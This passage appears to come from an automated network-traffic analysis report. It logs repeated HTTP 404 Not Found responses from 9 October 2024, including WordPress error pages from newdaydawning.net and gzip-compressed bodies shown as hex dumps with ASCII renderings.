            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 12:02:18 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 12:02:21 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Wed, 09 Oct 2024 12:02:23 GMTvary: User-AgentData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:32 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 32 64 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 0d 0a 35 31 0d 0a 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 2dlang="en-US" prefix="og: https://ogp.me/ns#" 51><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:02:34 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://newdaydawning.net/wp-json/>; rel="https://api.w.org/"Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 36 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 0d 0a 37 65 0d 0a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 20 70 72 65 66 69 78 3d 22 6f 67 3a 20 68 74 74 70 73 3a 2f 2f 6f 67 70 2e 6d 65 2f 6e 73 23 22 20 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 0d 0a Data Ascii: 16<!doctype html><html 7elang="en-US" prefix="og: https://ogp.me/ns#" ><head><link rel="profile" href="https://gmpg.org/xfn/11"><meta charset="
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 12:02:43 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 12:02:46 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 09 Oct 2024 12:02:49 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 b4 54 20 a8 2b 35 12 42 e2 b2 f6 8e ed 69 ed dd 68 77 9d 0f 10 ff 9d f1 3a 91 12 e2 92 5c a2 9d 8f f7 76 df 9b 71 7c 79 93 7e 5c fc 78 b8 85 ca 35 f5 f5 45 dc ff 41 5c a1 90 d7 17 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 7d e0 13 d6 6d 6b 04 b7 5d 62 12 38 dc b8 28 b7 d6 67 3c d4 18 32 2d b7 63 78 b5 14 c6 29 34 63 a0 c2 88 06 e1 37 83 1e ff 2a a4 b2 72 b3 ab e9 f4 f5 fc 24 b9 26 e9 aa 17 72 8d 30 25 a9 d9 f4 b4 6b 29 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 5f b8 c9 0a 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 4e 2f 96 89 fc b9 34 ba 55 72 e6 8c 50 96 d5 41 e5 8e eb fe 1c 89 d0 c9 38 20 9a 66 ca a2 d6 eb 59 45 52 a2 3a 45 88 23 6f d0 81 87 fc 06 e6 4a 82 fb f4 7b 00 8a bd 48 02 dc 2c c9 60 6f db ce e9 7d 15 29 89 9b 31 14 ba 66 96 31 88 ba de 37 dd a5 e9 dd d7 db 0f e9 a2 9f 83 7e 40 ce b7 19 9d 69 b7 a3 ba 0c 43 f8 e4 91 d9 25 f8 c6 23 16 2e 44 09 05 6d d0 82 65 21 39 1c 92 b5 2d 1f b5 82 46 67 c4 b3 26 71 45 39 47 c2 70 e0 55 7e 50 92 be 24 f4 87 39 90 22 47 ec 4a 87 88 c9 d5 64 3a 87 46 6c a8 69 9b c3 50 6b d1 f8 b3 c8 b8 6a 3a df bf 73 45 b8 5e 6a e3 ba 67 c6 d1 6e 21 e2 ce 0f 4f 2f 69 05 24 93 60 37 e0 bd 18 11 47 7d d6 e6 86 96 ee 70 3d 9e c4 4a f4 d1 7e 4b a4 ce db 86 0d 99 ac 0d 39 7c 73 64 fa 7e 41 46 f1 7f 71 a0 16 aa 6c 45 c9 4e 7e 61 f4 47 cf 19 8c 06 a1 f6 90 ef 60 64 4d 9e 04 51 64 51 6a be fc 33 6b 3d c9 75 13 15 a6 e9 8e d1 b9 fe 35 8f 86 5e 4f 6a 9d 0b 47 5a 4d 2a 6d 1d 30 ec d9 c6 d1 e7 f4 3e 7d 7c e8 29 6f 6e cf f1 8c a2 ee 3a 93 27 9e 99 e1 52 e6 8c 7f 46 bd 42 ff 94 bc ed 16 82 57 c0 2b e2 fd eb 7d 63 1f bb ef dc 5f 9d a7 e3 e7 f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 239TMo@WLP@qzCT +5Bihw:\vq|y~\x5EA\qN@^c%A}mk]b8(g<2-cx)4c7*r$&r0%k)$U2m$n]MRV._\TLXN/4UrPA8 fYER:E#oJ{H,`o})1f17~@iC%#.Dme!9-Fg&qE9GpU~P$9"GJd:FliPkj:sE^jgn!O/i$`7G}p=J~K9|sd~AFqlEN~aG`dMQdQj3k=u5^OjGZM*m0>}|)on:'RFBW+}c_0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 09 Oct 2024 12:02:51 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 